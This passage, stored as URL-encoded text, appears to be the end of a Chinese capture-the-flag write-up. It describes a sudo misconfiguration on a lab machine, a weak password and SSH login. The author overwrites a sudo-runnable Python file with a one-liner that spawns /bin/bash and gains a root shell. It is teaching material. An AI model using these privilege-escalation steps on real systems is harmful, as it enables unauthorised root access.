%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E8%BF%99%E6%A0%B7%E5%B0%B1%E8%83%BD%E6%8F%90%E6%9D%83%EF%BC%8C%E6%88%91%E5%BE%88%E6%87%B5%E9%80%BC%E3%80%82%0A%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A%0A%5Bhttps%3A%2F%2Fxz.aliyun.com%2Ft%2F2767%5D(https%3A%2F%2Fxz.aliyun.com%2Ft%2F2767)%0A%0A%E7%8E%B0%E5%9C%A8%E6%9F%A5%E7%9C%8B%20john%20%E7%9A%84%E5%AF%86%E7%A0%81%20password%20%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217182006.png)%0A%E6%88%91%E7%9A%84%E5%A4%A9%E5%95%A6%EF%BC%8C%E8%BF%99%E4%B9%88%E7%AE%80%E5%8D%95%E7%9A%84%E5%AF%86%E7%A0%81%EF%BC%8C%E8%BF%98%E4%B8%8D%E5%A6%82%E7%9B%B4%E6%8E%A5%20ssh%20%E7%88%86%E7%A0%B4%E5%91%A2%E3%80%82%0A%0Assh%20%E7%99%BB%E9%99%86%0A%E5%9C%A8%E8%BF%99%E9%87%8C%E6%88%91%E4%BB%AC%E5%B0%B1%E4%B8%8D%E7%9C%8B%20flag%20%E4%BA%86%EF%BC%8C%E7%9B%B4%E6%8E%A5%E6%8F%90%E6%9D%83%0A%0A**sudo%20-l**%20%E6%9F%A5%E7%9C%8B%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E5%8F%AF%E8%BF%90%E8%A1%8C%E7%9A%84%E6%96%87%E4%BB%B6%E6%88%96%E5%91%BD%E4%BB%A4%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217183211.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E6%98%BE%E7%A4%BA%E5%87%BA%E4%BA%86%20john%20%E5%AE%B6%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%20file.py%20%EF%BC%8C%E9%82%A3%E6%88%91%E4%BB%AC%E7%9C%8B%E4%B8%80%E4%B8%8Bfile.py%20%E6%9C%89%E4%BB%80%E4%B9%88%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217183304.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E5%8F%91%E7%8E%B0%20file.py%20%E6%98%AF%E7%A9%BA%E7%9A%84%E3%80%82%0A%0A%E6%97%A2%E7%84%B6%E8%BF%99%E6%A0%B7%EF%BC%8C%E6%88%91%E4%BB%AC%E8%87%AA%E5%B7%B1%E5%86%99%E5%86%85%E5%AE%B9%E7%84%B6%E5%90%8E%E9%80%9A%E8%BF%87%E5%AE%83%E6%8B%BF%E5%88%B0%20root%20%E6%9D%83%E9%99%90%3A%0A%60%60%60shell%0Aecho%20%22import%20os%3Bos.system('%2Fbin%2Fbash')%22%20%3E%20file.py%0A%60%60%60%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217183504.png)%0A%0A%E7%84%B6%E5%90%8E%E8%BF%90%E8%A1%8C%E5%8D%B3%E5%8F%AF%3A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217183719.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E7%9B%B4%E6%8E%A5%E8%BF%90%E8%A1%8C%E4%B8%8D%E5%85%81%E8%AE%B8%E3%80%82%E9%82%A3%E4%B9%88%E6%88%91%E4%BB%AC%E6%8A%8A%E8%B7%AF%E5%BE%84%E5%8A%A0%E4%B8%8A%0A%0A**sudo%20python3%20%2Fhome%2Fjohn%2Ffile.py**%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217183822.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E6%88%90%E5%8A%9F%E6%8B%BF%E5%88%B0%20root%20%E6%9D%83%E9%99%90%E3%80%82%0A%0A%0A%0A%23%23%20%E6%80%BB%E7%BB%93%0A%0A1.%20CVE-2021-4034%20%E5%BD%B1%E5%93%8D%E5%BE%88%E6%B7%B1%E3%80%82%0A2.%20%E5%88%9D%E8%AF%86%20%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83%E3%80%82%0A3.%20%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20getshell